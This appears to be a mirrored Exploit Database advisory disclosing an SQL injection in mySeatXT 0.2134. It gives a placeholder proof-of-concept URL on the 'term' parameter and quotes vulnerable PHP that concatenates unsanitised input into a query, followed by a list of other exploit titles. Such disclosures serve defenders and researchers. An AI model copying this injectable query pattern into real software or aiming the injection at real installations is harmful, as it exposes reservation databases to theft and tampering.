mySeatXT 0.2134 – SQL Injection

Exploit Database
15 阅读

作者： vinicius777

日期： 2014-01-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/31144/

########################################################################################
[+] Exploit: mySeatXT 0.2134 #
[+] Author: vinicius777					 #
[+] Contact: vinicius777 [AT] gmail@vinicius777_ #	 
[+] Vendor Homepage: http://sourceforge.net/projects/myseat#
########################################################################################


[1] Sql Injection
 

PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']



Vulnerable Code:
[+] autocomplete_res.php


$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);



#
#
# Greetz to g0tm1lk and TheColonial.

last Exploits
mySeatXT 0.2134 – SQL Injection的更多信息

WordPress Plugin dzs-videogallery – Arbitrary File Upload：
Online Learning Management System 1.0 – Multiple Stored XSS：
PHPCart 3.1.2 – ‘search.php’ Cross-Site Scripting：
OpenDocMan 1.2.6.1 – Cross-Site Request Forgery (Password Change)：
Joomla! Component com_listbingo 1.3 – Multiple Vulnerabilities：
QiHang Media Web Digital Signage 3.0.9 – Remote Code Execution (Unauthenticated)：
Family Connections Who is Chatting AddOn – Remote File Inclusion：
Apartment Visitor Management System (AVMS) 1.0 – ‘username’ SQL Injection：